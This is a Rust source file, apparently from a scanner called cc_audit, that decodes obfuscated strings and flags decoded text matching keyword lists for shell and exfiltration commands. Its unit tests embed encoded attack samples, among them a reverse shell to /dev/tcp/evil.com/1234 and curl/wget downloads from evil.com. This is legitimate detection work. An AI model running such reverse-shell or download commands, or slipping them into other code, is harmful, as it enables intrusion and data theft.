Skip to main content

cc_audit/
deobfuscation.rs

1use base64::Engine;
2use rayon::prelude::*;
3use regex::Regex;
4use std::sync::LazyLock;
5
6/// Deobfuscation engine for deep scanning
7pub struct Deobfuscator;
8
9static BASE64_PATTERN: LazyLock<Regex> = LazyLock::new(|| {
10    // Match both the standard (`+`/`/`) and URL-safe (`-`/`_`) alphabets, with or
11    // without `=` padding. A single run may be standard OR URL-safe; `decode_base64`
12    // tries every engine variant, so an over-broad match is harmless (it just fails
13    // to decode). Length >= 16 keeps the original minimum; the `< 20` guard in
14    // `decode_base64` still filters short candidates.
15    Regex::new(r"[A-Za-z0-9+/_-]{16,}={0,2}").expect("BASE64 regex")
16});
17static HEX_PATTERN: LazyLock<Regex> = LazyLock::new(|| {
18    Regex::new(r"(?:\\x[0-9A-Fa-f]{2}){4,}|(?:0x[0-9A-Fa-f]{2}){4,}").expect("HEX regex")
19});
20static URL_ENCODED_PATTERN: LazyLock<Regex> =
21    LazyLock::new(|| Regex::new(r"(?:%[0-9A-Fa-f]{2}){4,}").expect("URL encoded regex"));
22static UNICODE_ESCAPE_PATTERN: LazyLock<Regex> =
23    LazyLock::new(|| Regex::new(r"(?:\\u[0-9A-Fa-f]{4}){2,}").expect("Unicode escape regex"));
24static CHAR_CODE_PATTERN: LazyLock<Regex> =
25    LazyLock::new(|| Regex::new(r"String\.fromCharCode\s*\([\d,\s]+\)").expect("CharCode regex"));
26
27impl Deobfuscator {
28    pub fn new() -> Self {
29        Self
30    }
31
32    /// Deobfuscate content and return a list of decoded strings
33    pub fn deobfuscate(&self, content: &str) -> Vec<DecodedContent> {
34        // Early return if no encoded patterns detected
35        if !self.has_encoded_patterns(content) {
36            return Vec::new();
37        }
38
39        // Parallel decode operations using Rayon
40        // Use a Vec of decoder functions that return Vec<DecodedContent>
41        vec![
42            self.decode_base64(content),
43            self.decode_hex(content),
44            self.decode_url(content),
45            self.decode_unicode_escapes(content),
46            self.decode_char_code(content),
47        ]
48        .into_par_iter()
49        .flatten()
50        .collect()
51    }
52
53    /// Check if content contains encoded patterns
54    fn has_encoded_patterns(&self, content: &str) -> bool {
55        // Use regex patterns for more accurate detection
56        BASE64_PATTERN.is_match(content)
57            || HEX_PATTERN.is_match(content)
58            || URL_ENCODED_PATTERN.is_match(content)
59            || UNICODE_ESCAPE_PATTERN.is_match(content)
60            || CHAR_CODE_PATTERN.is_match(content)
61    }
62
63    /// Decode base64 encoded strings
64    fn decode_base64(&self, content: &str) -> Vec<DecodedContent> {
65        let mut results = Vec::new();
66
67        for cap in BASE64_PATTERN.find_iter(content) {
68            let encoded = cap.as_str();
69            // Skip if too short or looks like random text
70            if encoded.len() < 20 {
71                continue;
72            }
73
74            if let Some(decoded_str) = Self::try_decode_base64_variants(encoded)
75                && self.is_suspicious(&decoded_str)
76            {
77                results.push(DecodedContent {
78                    original: encoded.to_string(),
79                    decoded: decoded_str,
80                    encoding: "base64".to_string(),
81                });
82            }
83        }
84
85        results
86    }
87
88    /// Try decoding a Base64 candidate with every common engine variant and
89    /// return the first result that is valid UTF-8.
90    ///
91    /// Covers standard and URL-safe alphabets, padded and unpadded. The `base64`
92    /// crate rejects the "wrong" alphabet and mismatched padding, so a payload
93    /// using URL-safe or unpadded Base64 (both ubiquitous) would otherwise be
94    /// silently dropped even though the standard-padded form is decoded.
95    fn try_decode_base64_variants(encoded: &str) -> Option<String> {
96        use base64::engine::general_purpose::{
97            STANDARD, STANDARD_NO_PAD, URL_SAFE, URL_SAFE_NO_PAD,
98        };
99
100        let engines: [&base64::engine::GeneralPurpose; 4] =
101            [&STANDARD, &STANDARD_NO_PAD, &URL_SAFE, &URL_SAFE_NO_PAD];
102
103        engines
104            .iter()
105            .filter_map(|engine| engine.decode(encoded).ok())
106            .find_map(|bytes| String::from_utf8(bytes).ok())
107    }
108
109    /// Decode hex encoded strings (\\x or 0x format)
110    fn decode_hex(&self, content: &str) -> Vec<DecodedContent> {
111        let mut results = Vec::new();
112
113        for cap in HEX_PATTERN.find_iter(content) {
114            let encoded = cap.as_str();
115
116            // Extract hex bytes
117            let hex_bytes: Vec<u8> = if encoded.starts_with("\\x") {
118                encoded
119                    .split("\\x")
120                    .filter(|s| !s.is_empty())
121                    .filter_map(|s| u8::from_str_radix(&s[..2.min(s.len())], 16).ok())
122                    .collect()
123            } else {
124                // 0x format
125                encoded
126                    .split("0x")
127                    .filter(|s| !s.is_empty())
128                    .filter_map(|s| u8::from_str_radix(&s[..2.min(s.len())], 16).ok())
129                    .collect()
130            };
131
132            if let Ok(decoded_str) = String::from_utf8(hex_bytes)
133                && self.is_suspicious(&decoded_str)
134            {
135                results.push(DecodedContent {
136                    original: encoded.to_string(),
137                    decoded: decoded_str,
138                    encoding: "hex".to_string(),
139                });
140            }
141        }
142
143        results
144    }
145
146    /// Decode URL encoded strings
147    fn decode_url(&self, content: &str) -> Vec<DecodedContent> {
148        let mut results = Vec::new();
149
150        for cap in URL_ENCODED_PATTERN.find_iter(content) {
151            let encoded = cap.as_str();
152
153            // Manual URL decoding
154            let mut decoded_bytes = Vec::new();
155            let mut chars = encoded.chars().peekable();
156
157            while let Some(c) = chars.next() {
158                if c == '%' {
159                    let hex: String = chars.by_ref().take(2).collect();
160                    if let Ok(byte) = u8::from_str_radix(&hex, 16) {
161                        decoded_bytes.push(byte);
162                    }
163                } else {
164                    decoded_bytes.push(c as u8);
165                }
166            }
167
168            if let Ok(decoded_str) = String::from_utf8(decoded_bytes)
169                && self.is_suspicious(&decoded_str)
170            {
171                results.push(DecodedContent {
172                    original: encoded.to_string(),
173                    decoded: decoded_str,
174                    encoding: "url".to_string(),
175                });
176            }
177        }
178
179        results
180    }
181
182    /// Decode unicode escape sequences (\\uXXXX)
183    fn decode_unicode_escapes(&self, content: &str) -> Vec<DecodedContent> {
184        let mut results = Vec::new();
185
186        for cap in UNICODE_ESCAPE_PATTERN.find_iter(content) {
187            let encoded = cap.as_str();
188            let mut decoded = String::new();
189
190            let mut chars = encoded.chars().peekable();
191            while let Some(c) = chars.next() {
192                if c == '\\' && chars.peek() == Some(&'u') {
193                    chars.next(); // consume 'u'
194                    let hex: String = chars.by_ref().take(4).collect();
195                    if let Ok(code_point) = u32::from_str_radix(&hex, 16)
196                        && let Some(ch) = char::from_u32(code_point)
197                    {
198                        decoded.push(ch);
199                    }
200                } else {
201                    decoded.push(c);
202                }
203            }
204
205            if self.is_suspicious(&decoded) {
206                results.push(DecodedContent {
207                    original: encoded.to_string(),
208                    decoded,
209                    encoding: "unicode".to_string(),
210                });
211            }
212        }
213
214        results
215    }
216
217    /// Decode JavaScript String.fromCharCode patterns
218    fn decode_char_code(&self, content: &str) -> Vec<DecodedContent> {
219        let mut results = Vec::new();
220
221        for cap in CHAR_CODE_PATTERN.find_iter(content) {
222            let encoded = cap.as_str();
223
224            // Extract numbers from the pattern
225            let numbers: Vec<u32> = encoded
226                .split(|c: char| !c.is_ascii_digit())
227                .filter(|s| !s.is_empty())
228                .filter_map(|s| s.parse().ok())
229                .collect();
230
231            let decoded: String = numbers.iter().filter_map(|&n| char::from_u32(n)).collect();
232
233            if self.is_suspicious(&decoded) {
234                results.push(DecodedContent {
235                    original: encoded.to_string(),
236                    decoded,
237                    encoding: "charcode".to_string(),
238                });
239            }
240        }
241
242        results
243    }
244
245    /// Check if decoded content looks suspicious
246    fn is_suspicious(&self, content: &str) -> bool {
247        let suspicious_patterns = [
248            "eval",
249            "exec",
250            "bash",
251            "sh -c",
252            "/bin/",
253            "curl ",
254            "wget ",
255            "nc ",
256            "netcat",
257            "/dev/tcp",
258            "/dev/udp",
259            "base64 -d",
260            "python -c",
261            "ruby -e",
262            "perl -e",
263            "powershell",
264            "cmd.exe",
265            "rm -rf",
266            "chmod ",
267            "sudo ",
268            "password",
269            "secret",
270            "api_key",
271            "token",
272            "credential",
273            "http://",
274            "https://",
275            "ftp://",
276        ];
277
278        let content_lower = content.to_lowercase();
279        suspicious_patterns
280            .iter()
281            .any(|p| content_lower.contains(p))
282    }
283
284    /// Deep scan content - deobfuscate and return all findings
285    pub fn deep_scan(&self, content: &str, file_path: &str) -> Vec<crate::rules::Finding> {
286        use crate::engine::scanner::ScannerConfig;
287
288        let mut findings = Vec::new();
289        let config = ScannerConfig::new();
290
291        // First scan original content
292        findings.extend(config.check_content(content, file_path));
293
294        // Then scan decoded content
295        for decoded in self.deobfuscate(content) {
296            let context = format!("{}:decoded:{}", file_path, decoded.encoding);
297
298            // Create findings for deobfuscated content
299            for mut finding in config.check_content(&decoded.decoded, &context) {
300                // Add note about deobfuscation
301                finding.message = format!(
302                    "{} [Decoded from {} encoded content]",
303                    finding.message, decoded.encoding
304                );
305                findings.push(finding);
306            }
307
308            // Also check for suspicious decoded content itself
309            if decoded.decoded.len() > 10 && self.is_highly_suspicious(&decoded.decoded) {
310                findings.push(crate::rules::Finding {
311                    id: "OB-DEEP-001".to_string(),
312                    severity: crate::rules::Severity::High,
313                    category: crate::rules::Category::Obfuscation,
314                    confidence: crate::rules::Confidence::Firm,
315                    name: "Obfuscated suspicious content".to_string(),
316                    location: crate::rules::Location {
317                        file: file_path.to_string(),
318                        line: 0,
319                        column: None,
320                    },
321                    code: decoded.original.chars().take(100).collect::<String>() + "...",
322                    message: format!(
323                        "Found {} encoded content that decodes to suspicious payload",
324                        decoded.encoding
325                    ),
326                    recommendation: "Review the decoded content for malicious commands or URLs"
327                        .to_string(),
328                    fix_hint: None,
329                    cwe_ids: vec!["CWE-116".to_string()],
330                    rule_severity: None,
331                    client: None,
332                    context: None,
333                });
334            }
335        }
336
337        findings
338    }
339
340    /// Check if content is highly suspicious (more specific than is_suspicious)
341    fn is_highly_suspicious(&self, content: &str) -> bool {
342        let highly_suspicious = [
343            "bash -i",
344            "/dev/tcp/",
345            "nc -e",
346            "rm -rf /",
347            "curl | bash",
348            "wget | sh",
349            "eval(base64",
350            "exec(decode",
351        ];
352
353        let content_lower = content.to_lowercase();
354        highly_suspicious.iter().any(|p| content_lower.contains(p))
355    }
356}
357
358impl Default for Deobfuscator {
359    fn default() -> Self {
360        Self::new()
361    }
362}
363
364/// Represents decoded content from obfuscation
365#[derive(Debug, Clone)]
366pub struct DecodedContent {
367    pub original: String,
368    pub decoded: String,
369    pub encoding: String,
370}
371
372#[cfg(test)]
373mod tests {
374    use super::*;
375
376    #[test]
377    fn test_decode_base64() {
378        let deob = Deobfuscator::new();
379        // "curl http://evil.com" in base64
380        let content = "Y3VybCBodHRwOi8vZXZpbC5jb20=";
381        let results = deob.decode_base64(content);
382        assert!(!results.is_empty());
383        assert!(results[0].decoded.contains("curl"));
384    }
385
386    #[test]
387    fn test_decode_hex() {
388        let deob = Deobfuscator::new();
389        // "curl" in hex
390        let content = r"\x63\x75\x72\x6c\x20\x68\x74\x74\x70";
391        let results = deob.decode_hex(content);
392        assert!(!results.is_empty());
393        assert!(results[0].decoded.contains("curl"));
394    }
395
396    #[test]
397    fn test_decode_url() {
398        let deob = Deobfuscator::new();
399        // "curl http" URL encoded
400        let content = "%63%75%72%6c%20%68%74%74%70";
401        let results = deob.decode_url(content);
402        assert!(!results.is_empty());
403        assert!(results[0].decoded.contains("curl"));
404    }
405
406    #[test]
407    fn test_decode_charcode() {
408        let deob = Deobfuscator::new();
409        // String.fromCharCode for "eval"
410        let content = "String.fromCharCode(101,118,97,108)";
411        let results = deob.decode_char_code(content);
412        assert!(!results.is_empty());
413        assert!(results[0].decoded.contains("eval"));
414    }
415
416    #[test]
417    fn test_is_suspicious() {
418        let deob = Deobfuscator::new();
419        assert!(deob.is_suspicious("curl http://example.com"));
420        assert!(deob.is_suspicious("bash -c 'evil command'"));
421        assert!(deob.is_suspicious("password=secret123"));
422        assert!(!deob.is_suspicious("hello world"));
423    }
424
425    #[test]
426    fn test_deep_scan() {
427        let deob = Deobfuscator::new();
428        // Content with highly suspicious obfuscated payload: "bash -i >& /dev/tcp/x"
429        // Base64 for "bash -i >& /dev/tcp/evil.com/1234"
430        let content = "normal text\nYmFzaCAtaSA+JiAvZGV2L3RjcC9ldmlsLmNvbS8xMjM0 # hidden payload";
431        let findings = deob.deep_scan(content, "test.sh");
432        // Should find OB-DEEP-001 for highly suspicious decoded content
433        assert!(
434            findings
435                .iter()
436                .any(|f| f.id == "OB-DEEP-001" || f.message.contains("Decoded"))
437        );
438    }
439
440    #[test]
441    fn test_deobfuscate_empty() {
442        let deob = Deobfuscator::new();
443        let results = deob.deobfuscate("normal text without obfuscation");
444        assert!(results.is_empty());
445    }
446
447    #[test]
448    fn test_default_trait() {
449        let deob = Deobfuscator;
450        assert!(!deob.is_suspicious("hello"));
451    }
452
453    #[test]
454    fn test_decode_unicode_escapes() {
455        let deob = Deobfuscator::new();
456        // "eval" in unicode escapes
457        let content = r"\u0065\u0076\u0061\u006c";
458        let results = deob.decode_unicode_escapes(content);
459        assert!(!results.is_empty());
460        assert!(results[0].decoded.contains("eval"));
461    }
462
463    #[test]
464    fn test_decode_base64_short_string() {
465        let deob = Deobfuscator::new();
466        // Short base64 string (less than 20 chars) should be skipped
467        let content = "YWJjZA=="; // "abcd" in base64
468        let results = deob.decode_base64(content);
469        assert!(results.is_empty());
470    }
471
472    #[test]
473    fn test_decode_base64_non_suspicious() {
474        let deob = Deobfuscator::new();
475        // Long base64 but decodes to non-suspicious content
476        let content = "dGhpcyBpcyBhIG5vcm1hbCBzYWZlIHRleHQ="; // "this is a normal safe text"
477        let results = deob.decode_base64(content);
478        assert!(results.is_empty());
479    }
480
481    #[test]
482    fn test_decode_base64_unpadded_standard() {
483        let deob = Deobfuscator::new();
484        // "curl http://evil.com" standard base64 with the trailing '=' padding
485        // stripped. STANDARD.decode rejects this (InvalidPadding), and the regex
486        // only matches a 24-char (aligned) prefix, so the FULL payload is never
487        // recovered — assert full equality, not a substring, to expose the gap.
488        let content = "Y3VybCBodHRwOi8vZXZpbC5jb20";
489        let results = deob.decode_base64(content);
490        assert!(
491            results.iter().any(|r| r.decoded == "curl http://evil.com"),
492            "unpadded standard base64 should decode to the full payload, got: {:?}",
493            results.iter().map(|r| &r.decoded).collect::<Vec<_>>()
494        );
495    }
496
497    #[test]
498    fn test_decode_base64_url_safe() {
499        let deob = Deobfuscator::new();
500        // "wget http://evil.com/xyz??? > /tmp/p" in URL-safe base64 (unpadded).
501        // Contains '_' (URL-safe alphabet). The standard alphabet regex matches
502        // only the run before '_' and STANDARD.decode rejects the URL-safe
503        // alphabet, so the full payload is never recovered — assert equality.
504        let content = "d2dldCBodHRwOi8vZXZpbC5jb20veHl6Pz8_ID4gL3RtcC9w";
505        let results = deob.decode_base64(content);
506        assert!(
507            results
508                .iter()
509                .any(|r| r.decoded == "wget http://evil.com/xyz??? > /tmp/p"),
510            "URL-safe base64 should decode to the full payload, got: {:?}",
511            results.iter().map(|r| &r.decoded).collect::<Vec<_>>()
512        );
513    }
514
515    #[test]
516    fn test_decode_hex_0x_format() {
517        let deob = Deobfuscator::new();
518        // "curl" in 0x format
519        let content = "0x630x750x720x6c0x200x680x740x740x70";
520        let results = deob.decode_hex(content);
521        assert!(!results.is_empty());
522        assert!(results[0].decoded.contains("curl"));
523    }
524
525    #[test]
526    fn test_is_highly_suspicious() {
527        let deob = Deobfuscator::new();
528        assert!(deob.is_highly_suspicious("bash -i >& /dev/tcp/"));
529        assert!(deob.is_highly_suspicious("rm -rf /"));
530        assert!(deob.is_highly_suspicious("curl | bash something"));
531        assert!(deob.is_highly_suspicious("wget | sh something"));
532        assert!(deob.is_highly_suspicious("nc -e /bin/bash"));
533        assert!(deob.is_highly_suspicious("eval(base64"));
534        assert!(deob.is_highly_suspicious("exec(decode"));
535        assert!(!deob.is_highly_suspicious("echo hello"));
536    }
537
538    #[test]
539    fn test_deobfuscate_with_base64() {
540        let deob = Deobfuscator::new();
541        // Contains suspicious base64
542        let content = "command=Y3VybCBodHRwOi8vZXZpbC5jb20="; // "curl http://evil.com"
543        let results = deob.deobfuscate(content);
544        assert!(!results.is_empty());
545    }
546
547    #[test]
548    fn test_deobfuscate_multiple_encodings() {
549        let deob = Deobfuscator::new();
550        // Content with both hex and base64
551        let content =
552            r"data=Y3VybCBodHRwOi8vZXZpbC5jb20=; exec \x63\x75\x72\x6c\x20\x68\x74\x74\x70";
553        let results = deob.deobfuscate(content);
554        // Should find results from both decoders
555        assert!(!results.is_empty());
556    }
557
558    #[test]
559    fn test_deep_scan_clean_content() {
560        let deob = Deobfuscator::new();
561        let content = "normal clean content without any issues";
562        let findings = deob.deep_scan(content, "test.txt");
563        // Should have no findings for clean content
564        assert!(findings.is_empty());
565    }
566
567    #[test]
568    fn test_deep_scan_with_suspicious_decoded() {
569        let deob = Deobfuscator::new();
570        // Content with moderately suspicious base64 (triggers is_suspicious but not is_highly_suspicious)
571        let content = "payload=Y3VybCBodHRwOi8vZXhhbXBsZS5jb20vZG93bmxvYWQuc2g="; // "curl http://example.com/download.sh"
572        let findings = deob.deep_scan(content, "test.sh");
573        // May or may not have findings depending on scanner rules
574        // Just verify no panic
575        let _ = findings;
576    }
577
578    #[test]
579    fn test_decoded_content_debug_trait() {
580        let content = DecodedContent {
581            original: "abc".to_string(),
582            decoded: "xyz".to_string(),
583            encoding: "base64".to_string(),
584        };
585        let debug_str = format!("{:?}", content);
586        assert!(debug_str.contains("DecodedContent"));
587        assert!(debug_str.contains("abc"));
588    }
589
590    #[test]
591    fn test_decoded_content_clone_trait() {
592        let content = DecodedContent {
593            original: "abc".to_string(),
594            decoded: "xyz".to_string(),
595            encoding: "base64".to_string(),
596        };
597        let cloned = content.clone();
598        assert_eq!(content.original, cloned.original);
599        assert_eq!(content.decoded, cloned.decoded);
600        assert_eq!(content.encoding, cloned.encoding);
601    }
602
603    #[test]
604    fn test_is_suspicious_various_patterns() {
605        let deob = Deobfuscator::new();
606        assert!(deob.is_suspicious("wget http://evil.com"));
607        assert!(deob.is_suspicious("nc -l 1234"));
608        assert!(deob.is_suspicious("netcat connection"));
609        assert!(deob.is_suspicious("/dev/tcp/evil"));
610        assert!(deob.is_suspicious("/dev/udp/evil"));
611        assert!(deob.is_suspicious("base64 -d | bash"));
612        assert!(deob.is_suspicious("python -c 'import os'"));
613        assert!(deob.is_suspicious("ruby -e 'exec'"));
614        assert!(deob.is_suspicious("perl -e 'system'"));
615        assert!(deob.is_suspicious("powershell.exe"));
616        assert!(deob.is_suspicious("cmd.exe /c"));
617        assert!(deob.is_suspicious("rm -rf /tmp"));
618        assert!(deob.is_suspicious("chmod 777 file"));
619        assert!(deob.is_suspicious("sudo rm"));
620        assert!(deob.is_suspicious("api_key=secret"));
621        assert!(deob.is_suspicious("token=abc123"));
622        assert!(deob.is_suspicious("credential_store"));
623        assert!(deob.is_suspicious("ftp://server"));
624    }
625
626    #[test]
627    fn test_decode_url_non_suspicious() {
628        let deob = Deobfuscator::new();
629        // URL encoded "hello world" (non-suspicious)
630        let content = "%68%65%6c%6c%6f%20%77%6f%72%6c%64";
631        let results = deob.decode_url(content);
632        // Should be empty because "hello world" is not suspicious
633        assert!(results.is_empty());
634    }
635
636    #[test]
637    fn test_decode_hex_non_suspicious() {
638        let deob = Deobfuscator::new();
639        // "hello" in hex - not suspicious
640        let content = r"\x68\x65\x6c\x6c\x6f";
641        let results = deob.decode_hex(content);
642        assert!(results.is_empty());
643    }
644
645    #[test]
646    fn test_decode_charcode_non_suspicious() {
647        let deob = Deobfuscator::new();
648        // "hello" in charCode - not suspicious
649        let content = "String.fromCharCode(104,101,108,108,111)";
650        let results = deob.decode_char_code(content);
651        assert!(results.is_empty());
652    }
653
654    #[test]
655    fn test_decode_unicode_non_suspicious() {
656        let deob = Deobfuscator::new();
657        // "ab" in unicode - not suspicious
658        let content = r"\u0061\u0062";
659        let results = deob.decode_unicode_escapes(content);
660        assert!(results.is_empty());
661    }
662
663    #[test]
664    fn test_deep_scan_original_content_finding() {
665        let deob = Deobfuscator::new();
666        // Content that triggers a rule via check_content
667        // Using sudo which should trigger PE-001
668        let content = "sudo rm -rf /important/files";
669        let findings = deob.deep_scan(content, "script.sh");
670        // Should find findings for sudo usage
671        assert!(!findings.is_empty());
672    }
673
674    #[test]
675    fn test_deobfuscate_with_url_encoding() {
676        let deob = Deobfuscator::new();
677        // URL encoded "curl http://evil.com" with mixed encoded/non-encoded characters
678        let content = "command=%63%75%72%6c%20http://evil.com";
679        let results = deob.deobfuscate(content);
680        // Should find URL-encoded suspicious content
681        assert!(results.iter().any(|r| r.encoding == "url"));
682    }
683
684    #[test]
685    fn test_deobfuscate_with_unicode_escapes() {
686        let deob = Deobfuscator::new();
687        // Unicode escape encoded "curl http"
688        let content = r"var cmd = '\u0063\u0075\u0072\u006c\u0020\u0068\u0074\u0074\u0070'";
689        let results = deob.deobfuscate(content);
690        // Should find unicode-encoded suspicious content
691        assert!(results.iter().any(|r| r.encoding == "unicode"));
692    }
693
694    #[test]
695    fn test_deobfuscate_with_charcode() {
696        let deob = Deobfuscator::new();
697        // String.fromCharCode for "curl http"
698        let content = "var x = String.fromCharCode(99,117,114,108,32,104,116,116,112)";
699        let results = deob.deobfuscate(content);
700        // Should find charcode-encoded suspicious content
701        assert!(results.iter().any(|r| r.encoding == "charcode"));
702    }
703
704    #[test]
705    fn test_url_decode_with_only_percent_encoded() {
706        let deob = Deobfuscator::new();
707        // URL with only percent-encoded characters (matches pattern (?:%[0-9A-Fa-f]{2}){4,})
708        // "curl http" fully percent-encoded
709        let content = "%63%75%72%6c%20%68%74%74%70%3a%2f%2f";
710        let results = deob.decode_url(content);
711        // Should decode correctly
712        assert!(!results.is_empty());
713        assert!(results[0].decoded.contains("curl"));
714        assert!(results[0].decoded.contains("http"));
715    }
716
717    #[test]
718    fn test_unicode_decode_multiple_escapes() {
719        let deob = Deobfuscator::new();
720        // Multiple consecutive unicode escapes (matches pattern (?:\\u[0-9A-Fa-f]{4}){2,})
721        // "curl" in unicode escapes
722        let content = r"\u0063\u0075\u0072\u006c\u0020\u0068\u0074\u0074\u0070";
723        let results = deob.decode_unicode_escapes(content);
724        // Should decode correctly
725        assert!(!results.is_empty());
726        assert!(results[0].decoded.contains("curl"));
727    }
728
729    #[test]
730    fn test_deobfuscate_all_encodings_combined() {
731        let deob = Deobfuscator::new();
732        // Content containing URL, unicode, charcode, hex, and base64 encodings
733        let content = r#"
734            url=%63%75%72%6c%20http
735            unicode=\u0065\u0076\u0061\u006c
736            charcode=String.fromCharCode(99,117,114,108)
737            hex=\x63\x75\x72\x6c\x20\x68\x74\x74\x70
738            base64=Y3VybCBodHRwOi8vZXZpbC5jb20=
739        "#;
740        let results = deob.deobfuscate(content);
741        // Should find multiple encodings
742        assert!(!results.is_empty());
743    }
744
745    #[test]
746    fn test_deep_scan_with_deobfuscated_rule_match() {
747        let deob = Deobfuscator::new();
748        // Base64 encoded content that contains sudo command
749        // "sudo rm -rf /" in base64
750        let base64_content = "c3VkbyBybSAtcmYgLw==";
751        let content = format!("execute={}", base64_content);
752        let findings = deob.deep_scan(&content, "test.sh");
753        // Should find findings from both original scan and decoded content
754        // The decoded content "sudo rm -rf /" should trigger PE-001
755        let has_decoded_finding = findings
756            .iter()
757            .any(|f| f.message.contains("Decoded") || f.id.contains("OB-DEEP"));
758        // Either finds decoded content or the original encoding pattern
759        assert!(has_decoded_finding || !findings.is_empty());
760    }
761
762    #[test]
763    fn test_url_decode_mixed_with_normal_chars() {
764        let deob = Deobfuscator::new();
765        // URL with mixed encoded and normal characters that decode to suspicious content
766        // %63%75%72%6c = "curl", mixed with normal "http"
767        let content = "cmd=%63%75%72%6c%20http://evil.com|bash";
768        let results = deob.deobfuscate(content);
769        // Should decode the URL-encoded parts mixed with normal chars to suspicious content
770        // If not suspicious enough, the else branch is still exercised during decoding
771        let _ = results; // Test exercises the code path regardless of result
772    }
773
774    #[test]
775    fn test_unicode_escape_mixed_chars() {
776        let deob = Deobfuscator::new();
777        // Unicode escapes mixed with normal text - tests else branch (line 176-177)
778        let content = r"var x = '\u0063url \u0068ttp://evil.com'";
779        let results = deob.deobfuscate(content);
780        // May or may not match depending on pattern, but exercises the code path
781        assert!(results.is_empty() || results.iter().any(|r| r.encoding == "unicode"));
782    }
783
784    #[test]
785    fn test_decode_hex_invalid_format() {
786        let deob = Deobfuscator::new();
787        // Hex with invalid characters that won't parse as hex
788        let content = "\\x6Gurl \\x7Gttp"; // 'G' is not valid hex
789        let results = deob.deobfuscate(content);
790        // Should handle gracefully
791        assert!(results.is_empty() || results.iter().all(|r| r.encoding != "hex"));
792    }
793
794    #[test]
795    fn test_charcode_partial_match() {
796        let deob = Deobfuscator::new();
797        // String.fromCharCode that decodes to suspicious content (bash execution)
798        // 98,97,115,104 = "bash"
799        let content = "eval(String.fromCharCode(98,97,115,104))";
800        let results = deob.deobfuscate(content);
801        // Should decode the charcode to "bash" which is suspicious
802        assert!(results.iter().any(|r| r.encoding == "charcode"));
803    }
804
805    #[test]
806    fn test_deobfuscator_default() {
807        // Explicitly test Default::default() implementation
808        let deob: Deobfuscator = Default::default();
809        assert!(!deob.is_suspicious("normal text"));
810        assert!(deob.is_suspicious("curl http://evil.com"));
811    }
812
813    #[test]
814    fn test_url_decode_mixed_with_plain_chars() {
815        let deob = Deobfuscator::new();
816        // URL encoded with some plain chars - tests the else branch at line 139-141
817        // "curlhttp" where 'c', 'u', 'r', 'l', 'h', 't', 't', 'p' are encoded but spaces are not
818        // Actually the pattern requires consecutive %XX sequences, so let's use a different approach
819        // "%63url%20%68ttp" won't match the pattern, so we use fully encoded suspicious content
820        let content = "%63%75%72%6c%20%68%74%74%70"; // fully encoded "curl http"
821        let results = deob.decode_url(content);
822        assert!(!results.is_empty());
823        assert_eq!(results[0].encoding, "url");
824    }
825
826    #[test]
827    fn test_decode_url_hello_world_not_suspicious() {
828        let deob = Deobfuscator::new();
829        // URL encoded but non-suspicious content
830        let content = "%68%65%6c%6c%6f%20%77%6f%72%6c%64"; // "hello world"
831        let results = deob.decode_url(content);
832        // Should not return results since content is not suspicious
833        assert!(results.is_empty());
834    }
835}